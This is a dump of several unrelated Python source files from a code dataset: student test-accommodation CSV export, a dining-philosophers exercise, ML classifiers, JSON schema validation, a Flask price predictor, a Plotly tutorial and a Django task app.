data['Braille'].append('')\n\n\n try:\n data['Calculator'].append(el['accommodations']['5']['selected']['value'])\n except (NameError, TypeError):\n data['Calculator'].append('')\n\n\n try:\n data['Closed Captioning for ELA Listening Items'].append(el['accommodations']['13']['selected']['value'])\n except (NameError, TypeError):\n data['Closed Captioning for ELA Listening Items'].append('')\n\n\n try:\n data['Color Contrast (EMBEDDED)'].append(el['designated']['1']['selected']['value'])\n except (NameError, TypeError):\n data['Color Contrast (EMBEDDED)'].append('')\n\n\n try:\n data['*Color Contrast (NON-EMBEDDED)'].append(el['designated']['5']['selected']['value'])\n except (NameError, TypeError):\n data['*Color Contrast (NON-EMBEDDED)'].append('')\n\n try:\n data['Color Overlays'].append(el['designated']['6']['selected']['value'])\n except (NameError, TypeError):\n data['Color Overlays'].append('')\n\n try:\n data['*Magnification'].append(el['designated']['7']['selected']['value'])\n except (NameError, TypeError):\n data['*Magnification'].append('')\n\n try:\n data['Masking'].append(el['designated']['2']['selected']['value'])\n except (NameError, TypeError):\n data['Masking'].append('')\n\n try:\n data['Multiplication Table'].append(el['accommodations']['6']['selected']['value'])\n except (NameError, TypeError):\n data['Multiplication Table'].append('')\n\n try:\n data['Noise Buffers'].append(el['accommodations']['2']['selected']['value'])\n except (NameError, TypeError):\n data['Noise Buffers'].append('')\n\n try:\n data['*Print on Demand'].append(el['accommodations']['1']['selected']['value'])\n except (NameError, TypeError):\n data['*Print on Demand'].append('')\n\n try:\n data['*Read Aloud for ELA Reading Passages Grades 6-8 and 11'].append(el['accommodations']['4']['selected']['value'])\n except (NameError, TypeError):\n data['*Read Aloud for ELA Reading Passages Grades 6-8 and 11'].append('')\n\n try:\n data['*Read Aloud for Math and ELA Items'].append(el['designated']['9']['selected']['value'])\n except (NameError, TypeError):\n data['*Read Aloud for Math and ELA Items'].append('')\n\n try:\n data['*Scribe'].append(el['accommodations']['8']['selected']['value'])\n except (NameError, TypeError):\n data['*Scribe'].append('')\n\n try:\n data['*Scribe (for ELA non-writing items and Math items)'].append(el['designated']['15']['selected']['value'])\n except (NameError, TypeError):\n data['*Scribe (for ELA non-writing items and Math items)'].append('')\n\n try:\n data['Separate Setting'].append(el['designated']['8']['selected']['value'])\n except (NameError, TypeError):\n data['Separate Setting'].append('')\n\n try:\n data['*Speech-to-text'].append(el['accommodations']['7']['selected']['value'])\n except (NameError, TypeError):\n data['*Speech-to-text'].append('')\n\n try:\n data['*Stacked Translations for Math'].append(el['designated']['12']['selected']['value'])\n except (NameError, TypeError):\n data['*Stacked Translations for Math'].append('')\n\n try:\n data['*Text-to-speech for ELA Reading Passages Grades 6-8 and 11'].append(el['accommodations']['3']['selected']['value'])\n except (NameError, TypeError):\n data['*Text-to-speech for ELA Reading Passages Grades 6-8 and 11'].append('')\n\n try:\n data['*Text-to-speech for Math and ELA Items'].append(el['designated']['3']['selected']['value'])\n except (NameError, TypeError):\n data['*Text-to-speech for Math and ELA Items'].append('')\n\n try:\n data['Translated Text Directions'].append(el['designated']['16']['selected']['value'])\n except (NameError, TypeError):\n data['Translated Text Directions'].append('')\n\n try:\n data['Translated Test Directions for Math'].append(el['designated']['10']['selected']['value'])\n except (NameError, TypeError):\n data['Translated Test Directions for Math'].append('')\n\n try:\n data['*Translation Glossaries for Math (ET) (EMBEDDED)'].append(el['designated']['11']['selected']['value'])\n except (NameError, TypeError):\n data['*Translation Glossaries for Math (ET) (EMBEDDED)'].append('')\n\n try:\n data['Translation Glossaries for Math (ET) (NON-EMBEDDED)'].append(el['designated']['14']['selected']['value'])\n except (NameError, TypeError):\n data['Translation Glossaries for Math (ET) (NON-EMBEDDED)'].append('')\n\n\n col_order = [\n 'Student Last Name',\n 'Student First Name',\n 'SSID (consistent with TIDE)',\n 'Grade',\n 'Educator(s) completing ISAAP',\n 'Teacher of Record',\n 'School ID',\n 'School Name',\n 'Abacus',\n '*Alternate Response Options (including any external devices/assistive technologies)',\n 'American Sign Language for ELA Listening and Math Items',\n 'Bilingual Dictionary for ELA Full Writes (ET)',\n 'Braille',\n 'Calculator',\n 'Closed Captioning for ELA Listening Items',\n 'Color Contrast (EMBEDDED)',\n '*Color Contrast (NON-EMBEDDED)',\n 'Color Overlays',\n '*Magnification',\n 'Masking',\n 'Multiplication Table',\n 'Noise Buffers',\n '*Print on Demand',\n '*Read Aloud for ELA Reading Passages Grades 6-8 and 11',\n '*Read Aloud for Math and ELA Items',\n '*Scribe',\n '*Scribe (for ELA non-writing items and Math items)',\n 'Separate Setting',\n '*Speech-to-text',\n '*Stacked Translations for Math',\n '*Text-to-speech for ELA Reading Passages Grades 6-8 and 11',\n '*Text-to-speech for Math and ELA Items',\n 'Translated Text Directions',\n 'Translated Test Directions for Math',\n '*Translation Glossaries for Math (ET) (EMBEDDED)',\n 'Translation Glossaries for Math (ET) (NON-EMBEDDED)',\n ]\n\n\n df = pd.DataFrame(data)\n df = df[col_order]\n\n \n response = Response(content_type='application/octet-stream')\n response.headers['Content-Disposition'] = 'attachment; filename=\"data.csv\"'\n response.charset = 'utf8'\n response.body = df.to_csv(index=False).encode(encoding='UTF-8',errors='strict')\n return response\n\n\ndef convertToCSV(context, request):\n\n students = json.loads(request.POST['json_data'])\n\n data = {\n 'StudentIdentifier': [],\n 'StateAbbreviation': [],\n 'Subject': [],\n 'AmericanSignLanguage': [],\n 'ColorContrast': [],\n 'ClosedCaptioning': [],\n 'Language': [],\n 'Masking': [],\n 'PermissiveMode': [],\n 'PrintOnDemand': [],\n 'Zoom': [],\n 'StreamlinedInterface': [],\n 'TexttoSpeech': [],\n 'Translation': [],\n 'NonEmbeddedDesignatedSupports': [],\n 'NonEmbeddedAccommodations': [],\n 'Other': [],\n }\n\n for el in students:\n\n data['StudentIdentifier'].append(el['ssid'])\n data['StateAbbreviation'].append(el['state'])\n data['Subject'].append(el['subject']['selected']['value'])\n\n \n try:\n data['AmericanSignLanguage'].append(el['accommodations']['12']['selected']['value'])\n except (NameError, TypeError):\n data['AmericanSignLanguage'].append('')\n\n try:\n data['ColorContrast'].append(el['designated']['1']['selected']['value'])\n except (NameError, TypeError):\n data['ColorContrast'].append('')\n\n try:\n data['ClosedCaptioning'].append(el['accommodations']['13']['selected']['value'])\n except (NameError, TypeError):\n data['ClosedCaptioning'].append('')\n\n try:\n data['Language'].append(el['language']['selected']['value'])\n except (NameError, TypeError):\n data['Language'].append('')\n\n\n try:\n data['Masking'].append(el['designated']['2']['selected']['value'])\n except (NameError, TypeError):\n data['Masking'].append('')\n\n try:\n data['PermissiveMode'].append(el['permissive_mode']['selected']['value'])\n except (NameError, TypeError):\n data['PermissiveMode'].append('')\n\n try:\n data['PrintOnDemand'].append(el['accommodations']['1']['selected']['value'])\n except (NameError, TypeError):\n data['PrintOnDemand'].append('')\n\n try:\n data['Zoom'].append(el['designated']['18']['selected']['value'])\n except (NameError, TypeError):\n data['Zoom'].append('')\n\n try:\n data['StreamlinedInterface'].append(el['designated']['17']['selected']['value'])\n except (NameError, TypeError):\n data['StreamlinedInterface'].append('')\n\n try:\n data['TexttoSpeech'].append(el['designated']['3']['selected']['value'])\n except (NameError, TypeError):\n data['TexttoSpeech'].append('')\n\n try:\n data['Translation'].append(el['designated']['11']['selected']['value'])\n except (NameError, TypeError):\n data['Translation'].append('')\n\n non_des = ''\n # Bilingual Dictionary\n try:\n bil = el['designated']['13']['selected']['value']\n if bil == None:\n raise TypeError\n non_des += bil + \";\"\n except (NameError, TypeError):\n pass\n # Color Contrast\n try:\n color_contrast = el['designated']['5']['selected']['value']\n if color_contrast == None:\n raise TypeError\n non_des += color_contrast + \";\"\n except (NameError, TypeError):\n pass\n # Color Overlay\n try:\n color_overlay = el['designated']['6']['selected']['value']\n if color_overlay == None:\n raise TypeError\n non_des += color_overlay + \";\"\n except (NameError, TypeError):\n pass\n # Magnification\n try:\n mag = el['designated']['7']['selected']['value']\n if mag == None:\n raise TypeError\n non_des += mag + \";\"\n except (NameError, TypeError):\n pass\n # Noise Buffers\n try:\n noise_buff = el['accommodations']['2']['selected']['value']\n if noise_buff == None:\n raise TypeError\n if noise_buff == 'NEA_NoiseBuf':\n noise_buff = 'NEDS_NoiseBuf'\n non_des += noise_buff + \";\"\n except (NameError, TypeError):\n pass\n # Read Aloud\n try:\n read_aloud = el['designated']['9']['selected']['value']\n if read_aloud == None:\n raise TypeError\n non_des += read_aloud + \";\"\n except (NameError, TypeError):\n pass\n # Read Aloud in Spanish\n try:\n non_des += ''\n except (NameError, TypeError):\n pass\n # Separate Setting\n try:\n seperate_setting = el['designated']['8']['selected']['value']\n if seperate_setting == None:\n raise TypeError\n non_des += seperate_setting + \";\"\n except (NameError, TypeError):\n pass\n # Translated Test Directions\n try:\n translated = el['designated']['16']['selected']['value']\n if translated == None:\n raise TypeError\n non_des += translated + \";\"\n except (NameError, TypeError):\n pass\n # Translation (Glossary) \n try:\n translation = el['designated']['14']['selected']['value']\n if translation == None:\n raise TypeError\n if translation == 'English':\n translation = 'TDS_WL_Glossary'\n non_des += translation + \";\"\n except (NameError, TypeError):\n pass\n\n non_des = non_des.replace(';;', ';')\n data['NonEmbeddedDesignatedSupports'].append(non_des)\n\n\n non_accom = ''\n # Abacus\n try:\n abacus = el['accommodations']['11']['selected']['value']\n if abacus == None:\n raise TypeError\n if abacus == 'NEA_Abacus (Math only)':\n abacus = 'NEA_Abacus'\n non_accom += abacus + \";\"\n except (NameError, TypeError):\n pass\n # *Alternate Response Options (including any external devices/assistive technologies)\n try:\n alt = el['accommodations']['9']['selected']['value']\n if alt == None:\n raise TypeError\n non_accom += alt + \";\"\n except (NameError, TypeError):\n pass\n # Calculator\n try:\n calc = el['accommodations']['5']['selected']['value']\n if calc == None:\n raise TypeError\n if calc == 'NEA_Calc (Math only)':\n calc = 'NEA_Calc'\n non_accom += calc + \";\"\n except (NameError, TypeError):\n pass\n # Multiplication Table\n try:\n mult = el['accommodations']['6']['selected']['value']\n if mult == None:\n raise TypeError\n if multi == 'NEA_MT (Math only)':\n multi = 'NEA_MT'\n non_accom += multi + \";\"\n except (NameError, TypeError):\n pass\n # Print on Demand\n #try:\n # non_accom += el['accommodations']['1']['selected']['value'] + \";\"\n #except (NameError, TypeError):\n # pass\n # Read Aloud - *Read Aloud for ELA Reading Passages Grades 6-8 and 11\n try:\n read = el['accommodations']['4']['selected']['value']\n if read == None:\n raise TypeError\n if read == 'NEA_RA_Stimuli (ELA only)':\n read = 'NEA_RA_Stimuli'\n non_accom += read + \";\"\n except (NameError, TypeError):\n pass\n # Scribe\n try:\n scribe = el['accommodations']['8']['selected']['value']\n if scibe == None:\n raise TypeError\n if scribe == 'NEA_SC_WritItems (ELA only)':\n scribe = 'NEA_SC_WritItems'\n non_accom += scribe + \";\"\n except (NameError, TypeError):\n pass\n # Speech-to-text\n try:\n speech = el['accommodations']['7']['selected']['value']\n if speech == None:\n raise TypeError\n non_accom += speech + \";\"\n except (NameError, TypeError):\n pass\n\n non_accom = non_accom.replace(';;', ';')\n data['NonEmbeddedAccommodations'].append(non_accom)\n\n\n try:\n data['Other'].append('')\n except (NameError, TypeError):\n data['Other'].append('')\n\n\n\n col_order = [\n 'StudentIdentifier',\n 'StateAbbreviation',\n 'Subject',\n 'AmericanSignLanguage',\n 'ColorContrast',\n 'ClosedCaptioning',\n 'Language',\n 'Masking',\n 'PermissiveMode',\n 'PrintOnDemand',\n 'Zoom',\n 'StreamlinedInterface',\n 'TexttoSpeech',\n 'Translation',\n 'NonEmbeddedDesignatedSupports',\n 'NonEmbeddedAccommodations',\n 'Other',\n ]\n\n\n df = pd.DataFrame(data)\n df = df[col_order]\n\n \n response = Response(content_type='application/octet-stream')\n response.headers['Content-Disposition'] = 'attachment; filename=\"data.csv\"'\n response.charset = 'utf8'\n response.body = df.to_csv(index=False).encode(encoding='UTF-8',errors='strict')\n return response\n\n\n\ndef convertToCSV2(context, request):\n\n session = request.db\n\n students = json.loads(request.POST['json_data'])\n\n #students = request.json_body['students']\n\n fp = ''\n\n for el in students:\n fp += el['firstname']+','+el['lastname']+','+el['ssid']+','+el['school']+','+el['grade']+','+el['teacher']\n\n this_item = el['universal_tools']\n this_list = (\n 'Breaks', \n 'Calculator', \n 'Digital Notes' , \n 'English Dictionary', \n 'English Glossary', \n 'Expandable Passages', \n 'Global Notes', \n 'Highlighter', \n 'Keyboard Navigation', \n 'Mark for Review', \n 'Math Tools', \n 'Spell Check', \n 'Strikethrough', \n 'Writing Tools', \n 'Zoom'\n )\n for el2 in this_list:\n x = list(filter(lambda x: x['text'] == el2, this_item))[0]\n if (x['select'] == True):\n fp += ','+x['text']\n else:\n fp += ',,'\n\n\n\n this_item = el['universal_tools_ne']\n this_list = (\n 'Breaks', \n 'Scratch Paper', \n 'Thesaurus' , \n 'English Dictionary', \n )\n for el2 in this_list:\n x = list(filter(lambda x: x['text'] == el2, this_item))[0]\n if (x['select'] == True):\n fp += ','+x['text']\n else:\n fp += ',,'\n\n\n this_item = el['ident_student_needs']\n this_list = (\n 'Individualized Education Program', \n '504 Plan', \n 'Educator(s) Recommendation', \n )\n for el2 in this_list:\n x = list(filter(lambda x: x['text'] == el2, this_item))[0]\n if (x['select'] == True):\n fp += ','+x['text']\n else:\n fp += ',,'\n\n\n fp += '\\n'\n\n response = Response(content_type='application/octet-stream')\n response.headers['Content-Disposition'] = 'attachment; filename=\"data.csv\"'\n response.charset = 'utf8'\n response.body = fp.encode(encoding='UTF-8',errors='strict')\n return response\n\n\ndef saveToJSON(context, request):\n\n #students = request.POST['json_data']\n students = request.json_body['students']\n\n #response = Response(content_type='application/octet-stream')\n #response = Response(content_type='text/plain;charset=utf-8')\n #date = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n #response.headers['Content-Disposition'] = 'attachment; filename=\"save-'+date+'.json\"'\n #response.charset = 'utf8'\n #response.body = json.dumps(students).encode(encoding='UTF-8',errors='strict')\n #response.text = students\n return students\n\n\n\n\n\n\n\n","repo_name":"SmarterApp/ARI_Prototype","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":28735,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"37878508054","text":"from threading import Thread, Lock\r\nfrom random import randint\r\nfrom time import sleep\r\nimport sys\r\n\r\ni = 1\r\n\r\nN = 5\r\nLEFT = (i+N-1)%N\r\nRIGHT = (i+1)%N\r\nTHINKING = 0\r\nHUNGRY = 1\r\nEATING = 2\r\n\r\nstate = []\r\n\r\nmutex = Lock()\r\nsem_fil = []\r\n\r\n\r\ndef test(i):\r\n global N\r\n global HUNGRY\r\n global EATING\r\n LEFT = (i + N - 1) % N\r\n RIGHT = (i + 1) % N\r\n if(state[i] == HUNGRY & state[LEFT] != EATING & state[RIGHT] != EATING):\r\n state[i] = EATING\r\n print(\"O filosofo\", i, \"esta comendo!\")\r\n if sem_fil[i].locked() is True:\r\n sem_fil[i].release()\r\n\r\ndef pegar_garfo(i):\r\n global N\r\n global HUNGRY\r\n global EATING\r\n mutex.acquire()\r\n state[i] = HUNGRY\r\n print(\"O filosofo\", i, \"com fome!\")\r\n test(i)\r\n mutex.release()\r\n sem_fil[i].acquire()\r\n\r\ndef por_garfo(i):\r\n global N\r\n global HUNGRY\r\n global EATING\r\n LEFT = (i + N - 1) % N\r\n RIGHT = (i + 1) % N\r\n mutex.acquire()\r\n state[i] = THINKING\r\n print(\"O filosofo\", i, \"esta pensando!\")\r\n test(LEFT)\r\n test(RIGHT)\r\n mutex.release()\r\n\r\ndef pensar(i):\r\n float_rand=randint(0,1)\r\n sleep(float_rand)\r\n\r\ndef comer(i):\r\n float_rand =randint(0, 1)\r\n sleep(float_rand)\r\n\r\ndef acao_filosofo(j):\r\n while(True):\r\n pensar(j)\r\n pegar_garfo(j)\r\n comer(j)\r\n por_garfo(j)\r\n\r\nfor i in range(N):\r\n state.append(0)\r\n\r\n\r\n#inicia os semaforos\r\n\r\nfor i in range(N):\r\n sem_fil.append(Lock())\r\n\r\n#cria as threads(filosofos)\r\n\r\nthreads = []\r\nfor i in range(N):\r\n threads.append(Thread(target=acao_filosofo, args=[i]))\r\n threads[i].start()","repo_name":"ErickPimentel/SistemasOperacionais","sub_path":"Roteiro 4/jantardosfilosofos.py","file_name":"jantardosfilosofos.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33521953529","text":"from keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.utils import np_utils\nimport scipy\nfrom sklearn import neighbors\nfrom sklearn.metrics import confusion_matrix\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n\ndef knn_fit(trainX, trainy):\n clf = neighbors.KNeighborsClassifier(5, 'distance')\n clf.fit(trainX, trainy)\n return clf\n\ndef knn_test(clf, testX, testy):\n predictions = clf.predict(testX)\n c = confusion_matrix(testy, predictions)\n return c\n\ndef nn_fit(trainX, trainy):\n traincaty = np_utils.to_categorical(trainy)\n nout = traincaty.shape[1]\n print(\"NOUT: \", nout)\n\n model = Sequential()\n model.add(Dense(64, input_dim=62, activation='relu'))\n model.add(Dense(32, activation='relu'))\n model.add(Dense(16, activation='relu'))\n model.add(Dense(8, activation='relu'))\n model.add(Dense(nout, activation='softmax'))\n\n model.compile(loss=\"binary_crossentropy\", optimizer=\"adam\", metrics=[\"accuracy\"])\n model.fit(trainX, traincaty, epochs=40, batch_size=10)\n return model\n\ndef nn_test(model, testX, testy=None):\n predictions = model.predict(testX)\n predictions = predictions.argmax(axis=1)\n if testy is not None:\n scores = model.evaluate(testX, np_utils.to_categorical(testy))\n c = confusion_matrix(testy, predictions)\n return c\n else:\n return predictions\n\ndef fit_validate(X, y, fitfunc=knn_fit, testfunc=knn_test, display=False):\n Xy = np.hstack([X.T, y.T])\n np.random.shuffle(Xy)\n samples = int(Xy.shape[0]*0.75)\n trainX, trainy = Xy[:samples,:-1], Xy[:samples,-1]\n testX, testy = Xy[samples:,:-1], Xy[samples:,-1]\n\n model = fitfunc(trainX, trainy)\n c = testfunc(model, testX, testy)\n if display:\n plt.imshow(c)\n plt.show()\n return c, model\n\n","repo_name":"sddhrthrt/sidewalk_terrain_estimation","sub_path":"src/learn.py","file_name":"learn.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"23816180672","text":"import os\nimport json\nimport jsonschema\nfrom flask import current_app\n\n\n# Custom validators\ndef _required(validator, required, instance, schema):\n \"\"\"\n The JSON schema validator currently does not have a way to retrieve the name of a missing required property.\n This function is a workaround that appends the name to the schema_path.\n\n Source: https://github.com/Julian/jsonschema/issues/119\n\n :param validator: JSON Schema Draft 4\n :param required:\n :param instance:\n :param schema:\n :return:\n \"\"\"\n if not validator.is_type(instance, 'object'):\n return\n\n for index, requirement in enumerate(required):\n if requirement not in instance:\n error = jsonschema.ValidationError(\n '{0!r} is a required property'.format(requirement)\n )\n error.schema_path.append(index)\n yield error\n\n\n# Construct validator as extension of Json Schema Draft 4.\nValidator = jsonschema.validators.extend(\n validator=jsonschema.validators.Draft4Validator,\n validators={\n 'required': _required\n }\n)\n\n\ndef validate_json(data, schema_path, schema_name):\n \"\"\"\n Validate the provided data against the provided JSON schema.\n\n :param data: JSON data to be validated\n :param schema_path: path to schema\n :param schema_name: name of the schema\n :return: dictionary of key-value ({property: error message}) pairs for validation errors\n :rtype: dict\n \"\"\"\n errors = {}\n with open(os.path.join(\n current_app.config['SCHEMAS_DIRECTORY'],\n schema_path,\n \".\".join((schema_name, 'json'))), 'r') as fp:\n resolver = jsonschema.RefResolver(\n 'file://' + os.path.join(current_app.config['SCHEMAS_DIRECTORY'], schema_path), None)\n validator = Validator(json.load(fp), resolver=resolver)\n for error in validator.iter_errors(data):\n # get property name\n if error.schema_path[0] == \"anyOf\":\n for value in error.validator_value:\n for property_name in value[\"required\"]:\n if not data.get(property_name):\n errors[property_name] = [\"This field is required.\"]\n continue\n elif error.schema_path[0] == \"required\":\n property_name = error.validator_value[error.schema_path[1]]\n else:\n property_name = error.path[0]\n # get error message\n if error.schema_path[0] == \"required\":\n message = \"This field is required\"\n elif error.schema.get('error') is not None:\n message = error.schema['error'].get(error.validator, error.message)\n else:\n message = error.message\n # append error message\n if errors.get(property_name) is not None:\n errors[property_name].append(message)\n else:\n errors[property_name] = [message]\n return errors\n","repo_name":"CityOfNewYork/DORIS-Publications-Portal","sub_path":"app/resources/lib/schema_utils.py","file_name":"schema_utils.py","file_ext":"py","file_size_in_byte":3006,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"30288837076","text":"#If the bill was $150.00, split between 5 people, with 12% tip. \n\n#Each person should pay (150.00 / 5) * 1.12 = 33.6\n#Format the result to 2 decimal places = 33.60\n\n#Tip: There are 2 ways to round a number. You might have to do some Googling to solve this.💪\n\n#Write your code below this line 👇\n\n\nprint(\"Welcome to the tip calculator!\")\nbill = input(\"What was the total bill? \\n$\")\ntip = input(\"How much tip would you like to give? (Usually: 10%, 12%, or 15%) \\n%\")\npeople = input(\"How many people to split the bill? \\n\")\nresult = round((float(bill) / int(people) * (float(tip)/100 + 1)), 2)\nresult = \"{:.2f}\" .format(result)\nmessage = f\"Each person should pay: ${result}\"\n\nprint(message)","repo_name":"Bishamonka/Python","sub_path":"day-2.py","file_name":"day-2.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1065037604","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jun 20 13:39:48 2023\r\n\r\n@author: Ofek biton & Shahaf Malka\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jun 20 13:39:48 2023\r\n@author: Ofek biton & Shahaf Malka\r\n\"\"\"\r\n\r\nfrom flask import Flask, render_template, request\r\nimport pandas as pd\r\nimport numpy as np\r\nimport pickle\r\nimport os\r\n\r\napp = Flask(__name__)\r\n\r\nwith open('trained_model.pkl', 'rb') as file:\r\n model = pickle.load(file)\r\n\r\nwith open('preprocessor.pkl', 'rb') as file:\r\n preprocessor = pickle.load(file)\r\n \r\n \r\n@app.route('/')\r\ndef home():\r\n print(model.feature_names_in_)\r\n return render_template('index.html')\r\n\r\n@app.route('/predict', methods=['POST'])\r\ndef predict():\r\n city = request.form.get('City')\r\n property_type = request.form.get('type')\r\n hasParking = request.form.get('hasParking')\r\n hasAirCondition = request.form.get('hasAirCondition')\r\n handicapFriendly = request.form.get('handicapFriendly')\r\n hasMamad = request.form.get('hasMamad')\r\n room_number = request.form.get('room_number')\r\n area = request.form.get('Area')\r\n room_number= float(room_number)\r\n area = float(area)\r\n \r\n string_features = ['אילת', 'באר שבע', 'בית שאן', 'בת ים', 'גבעת שמואל', 'דימונה', 'הוד השרון', 'הרצליה', 'זכרון יעקב', 'חולון', 'חיפה', 'יהוד מונוסון', 'ירושלים', 'כפר סבא', 'מודיעין מכבים רעות', 'נהריה', 'נוף הגליל', 'נס ציונה', 'נתניה', 'פתח תקווה', 'צפת', 'קרית ביאליק', 'ראשון לציון', 'רחובות', 'רמת גן', 'רעננה', 'שוהם', 'תל אביב', 'בית פרטי', 'דו משפחתי', 'דירה בבניין', 'דירת גן', 'פנטהאוז']\r\n \r\n new_data = pd.DataFrame({\r\n 'City': [city],\r\n 'type': [property_type],\r\n 'room_number': [room_number],\r\n 'Area': [area],\r\n 'hasParking': [hasParking],\r\n 'hasAirCondition' : [hasAirCondition],\r\n 'hasMamad' : [hasMamad],\r\n 'handicapFriendly' : [handicapFriendly]\r\n })\r\n \r\n for feature in string_features:\r\n new_data[feature] = 0\r\n \r\n new_data_enc = preprocessor.transform(new_data)\r\n predicted_price = model.predict(new_data_enc)[0]\r\n text_output = f\"Predicted Property Value: {predicted_price:.2f}\"\r\n\r\n return render_template('index.html', prediction_text =text_output)\r\n\r\nif __name__ == \"__main__\":\r\n port = int(os.environ.get('PORT', 5000))\r\n \r\n app.run(host='0.0.0.0', port=port, debug=True)\r\n","repo_name":"Ofekbiton4/Final-assiment","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11715898991","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 29 18:10:45 2021\n\n@author: ali_d\n\"\"\"\n\n# Inset Plots\n\nimport numpy as np \nimport pandas as pd \n\n\nfrom plotly.offline import init_notebook_mode, iplot, plot\nimport plotly as py\ninit_notebook_mode(connected=True)\nimport plotly.graph_objs as go\n\nimport matplotlib.pyplot as plt\n\nimport plotly.graph_objs as go\n\ntimesData = pd.read_csv(\"timesData.csv\")\n\ndataframe = timesData[timesData.year == 2015]\n\n\ntrace1 = go.Scatter(\n x = dataframe.world_rank,\n #x eksenim dunya sıralamam\n \n y = dataframe.teaching,\n #y eksenim teachin skorum\n \n name = \"teaching\",\n #label ismim\n marker = dict(color = \"rgba(16,112,2,0.8)\"),\n )\n #rengim ve saydamlığım\n\n\ntrace2 = go.Scatter(\n x=dataframe.world_rank,\n y=dataframe.income,\n xaxis='x2',\n yaxis='y2',\n name = \"income\",\n marker = dict(color = 'rgba(160, 112, 20, 0.8)'),\n)\n\n\ndata = [trace1,trace2]\n#verilerimi data içinde birleştiriyorum\n\nlayout = go.Layout(\n xaxis2=dict(\n domain=[0.6, 0.95],\n anchor='y2', \n ),\n yaxis2=dict(\n domain=[0.6, 0.95],\n anchor='x2',\n ),\n title = 'Income and Teaching vs World Rank of Universities'\n\n)\n#bunun dıger plotlardan farkı ıkı tane plot iç içe \n#domain yerımızı belirtiyor\n#anchor='y2' bu ıkıncı plotumu cızmek için kulandığımız bir sey\nfig = go.Figure(data=data, layout=layout)\n#figurumu olusturuyorum\niplot(fig)\n#plot etırıyorum\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"ALDOR99/BACK.END-FRONT.END-ALGORITHMS","sub_path":"Python-main/Data Visualization/plotly/10-Inset Plots.py","file_name":"10-Inset Plots.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31321616922","text":"from django.shortcuts import render, redirect\nfrom rest_framework import status, permissions\nfrom rest_framework.decorators import api_view\nfrom django.contrib.auth.decorators import login_required\nfrom rest_framework.response import Response\nfrom .models import Task\nfrom .serializers import TaskSerializer\nfrom .forms import TaskForm, UserForm\nfrom rest_framework import viewsets\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth import authenticate\n\n\n# Create your views here.\n\n\nclass TaskViewSet(viewsets.ModelViewSet):\n queryset = Task.objects.all().order_by('status')\n serializer_class = TaskSerializer\n\n\ndef login(request):\n f = UserForm(request.POST)\n return render(request, \"registration/login.html\", {'form': f})\n\n\n@api_view(['GET'])\ndef view_all_tasks(request):\n ''' view all tasks '''\n tasks = Task.objects.all()\n serializer = TaskSerializer(tasks, many=True)\n # permissions_classes = (permissions.IsAuthenticatedOrReadOnly,)\n return Response(serializer.data)\n\n\n@api_view(['PUT'])\ndef edit_task_detail(request, detail_id):\n '''view all details for one task'''\n specific_task = Task.objects.get(id=detail_id)\n serializer = TaskSerializer(specific_task, many=False)\n # permissions_classes = (permissions.IsAuthenticatedOrReadOnly,)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\n@login_required\ndef user_detail(request, user_id):\n '''view all tasks created by a specific user'''\n user_tasks = Task.objects.get(owner_id=user_id)\n serializer = TaskSerializer(user_tasks, many=True)\n return Response(serializer.data)\n\n\n@api_view(['DELETE'])\n@login_required\ndef delete_task(request, detail_id):\n '''delete a single task'''\n trash_task = Task.objects.get(id=detail_id)\n if trash_task.delete():\n return redirect('/')\n else:\n return \"error\"\n\n#\n@login_required\ndef new_task(request):\n\n\n return render(request, \"tasks/create.html\", {\"task_form\": new_task, \"user\": user, \"test\": \"test\"})\n\n\ndef index(request):\n '''UI homepage'''\n '''loads form to create a new task'''\n user = request.user\n if request.method == 'POST':\n new_task = TaskForm(request.POST)\n if new_task.is_valid():\n new_task.save(commit=False)\n new_task.owner = request.user.id\n new_task.save()\n return redirect(\"tasks\")\n else:\n new_task = TaskForm()\n return render(request, \"tasks/index.html\", {'add_new': new_task, 'user': user, \"test\": 'test'})\n\n\n@api_view(['POST'])\ndef add_task_to_DB(request, form_info):\n ''' sends form info to db as a new task'''\n new_task = Task(form_info)\n data = JSONparser().parse(new_task)\n serializer = TaskSerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n return JsonResponse(serializer.data)\n\n return JsonResponse(serializer.errors, status=400)\n\n\ndef signup(request):\n if request.method == 'POST':\n form = UserCreationForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n raw_password = form.cleaned_data.get('password1')\n user = authenticate(username=username, password=raw_password)\n login(request)\n return redirect('login')\n else:\n form = UserCreationForm()\n return render(request, 'signup.html', {'form': form})\n\n\ndef edit(request, task_id):\n # t = Task.objects.get(id=task_id)\n # print(t)\n form = TaskForm()\n return render(request, 'tasks/edit.html', {'form': form})\n","repo_name":"ryan-semmler/trello_clone","sub_path":"tasks/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74187385213","text":"# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = 